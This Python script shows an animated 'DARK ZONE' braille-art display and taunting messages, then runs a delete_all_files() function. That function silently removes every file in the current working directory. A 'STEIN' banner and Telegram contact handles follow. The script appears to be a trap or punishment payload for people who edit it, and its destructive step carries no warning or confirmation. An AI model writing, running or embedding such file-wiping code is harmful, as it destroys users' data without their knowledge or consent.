import time
import os
import sys
import pyfiglet
from pystyle import Colors, Colorate, Anime
from colorama import Fore, init

# Initialize colorama
init(autoreset=True)

def print_text1():
    text1 = """
⣿⣿⣿⣿⣿⣿⡟⠁⠄⠄⠄⠄⣠⣤⣴⣶⣶⣶⣶⣤⡀⠈⠙⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⡟⠄⠄⠄⠄⠄⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠄⠈⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⠁⠄⠄⠄⢀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠄⢺⣿⣿⣿⣿
⣿⣿⣿⣿⣿⡄⠄⠄⠄⠙⠻⠿⣿⣿⣿⣿⠿⠿⠛⠛⠻⣿⡄⠄⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⡇⠄⠄⠁ 👁️ ⠄⢹⣿⡗⠄ 👁️ ⢄⡀⣾⢀⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⡇⠘⠄⠄⠄⢀⡀⠄⣿⣿⣷⣤⣤⣤⣾⣿⣿⣧⢸⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⡇⠄⣰⣿⡿⠟⠃⠄⣿⣿⣿⣿⣿⡛⠿⢿⣿⣷⣾⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⡄⠈⠁⠄⠄⠄⠄⠻⠿⢛⣿⣿⠿⠂⠄⢹⢹⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⡐⠐⠄⠄⣠⣀⣀⣚⣯⣵⣶⠆⣰⠄⠞⣾⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣷⡄⠄⠄⠈⠛⠿⠿⠿⣻⡏⢠⣿⣎⣾⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⡿⠟⠛⠄⠄⠄⠄⠄⠙⣛⣿⣿⣵⣿⡿⢹⡟⣿⣿⣿⣿⣿
    """
    print(Colorate.Horizontal(Colors.blue_to_purple, text1))
    sys.stdout.flush()

def print_text2():
    text2 = """
⠀⠀⠀⠀⠀⠀⢠⣾⣻⣻⣻⣻⠟⠛⠋⠉⠉⠉⠉⠛⢿⣷⣦⡀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢠⣻⣻⣻⣻⣻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣻⣷⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣾⣻⣻⣻⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣻⣻⡅⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢻⣻⣻⣻⣦⣄⣀⠀⠀⠀⠀⣀⣀⣤⣤⣄⠀⢻⣻⠁⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢸⣻⣻⣾ 👁️ ⣻⡆⠀⢨⣻ 👁️ ⡻⢿⠁⡿⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢸⣧⣻⣻⣻⡿⢿⣻⠀⠀⠈⠛⠛⠁⠀⠀⠀⠘⡇⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢸⣻⠏⠀⢀⣠⣼⣻⠀⠀⠀⠀⠀⢤⣀⡀⠀⠈⠁⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢻⣷⣾⣻⣻⣻⣻⣄⣀⡤⠀⠀⣀⣽⣻⡆⡆⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⢯⣯⣻⣻⠟⠿⠿⠥⠐⠊⠉⣹⠏⣻⣡⠁⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠈⢻⣻⣻⣷⣤⣀⣀⣀⠄⢰⡟⠀⠱⠁⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣠⣤⣻⣻⣻⣻⣦⠤⠀⠀⠊⠀⢀⡆⢠⠀⠀⠀⠀⠀
    """
    print(Colorate.Horizontal(Colors.blue_to_purple, text2))
    sys.stdout.flush()

def clear_screen():
    os.system('cls' if os.name == 'nt' else 'clear')

def slow_print(text, delay=0.1):
    # Print each character one by one with pystyle
    for char in text:
        sys.stdout.write(Colorate.Horizontal(Colors.blue_to_purple, char))
        sys.stdout.flush()
        time.sleep(delay)  # Adjust the speed here
    print()

def delete_all_files():
    # Deletes all files in the current directory
    for filename in os.listdir('.'):
        if os.path.isfile(filename):
            os.remove(filename)

def main():
    # Print welcome message in blue to purple (no animation) for 2 seconds
    welcome_message = "Hey WELCOME TO DARK ZONE"
    print(Colorate.Horizontal(Colors.blue_to_purple, welcome_message))
    time.sleep(2)  # Pause for 2 seconds before proceeding

    # Start switching between text1 and text2
    start_time = time.time()
    while time.time() - start_time < 4:
        print_text1()
        time.sleep(0.1)
        clear_screen()
        
        print_text2()
        time.sleep(0.1)
        clear_screen()

    # Print message after 4 seconds, alphabet by alphabet using pystyle
    slow_print("Why you Tried to change the script? You know it don't work when you change things brother.\n")

    # Slow print alphabet by alphabet using pystyle
    slow_print("I hope you understand things now?\n")

    # Delete all files in the directory
    delete_all_files()

    # Print "STEIN" using pyfiglet and colorama
    stein_art = pyfiglet.figlet_format("STEIN")
    print(Fore.RED + stein_art)  # Red color for "STEIN"

    # Additional information using pystyle
    additional_info1 = "DEVELOPER : @demonpis TELEGRAM"
    additional_info2 = "CHANNEL: @kyixo TELEGRAM"
    print(Colorate.Horizontal(Colors.blue_to_purple, additional_info1))
    print(Colorate.Horizontal(Colors.blue_to_purple, additional_info2))

    time.sleep(4)  # Display STEIN and additional information for 4 seconds before exiting

if __name__ == "__main__":
    main()
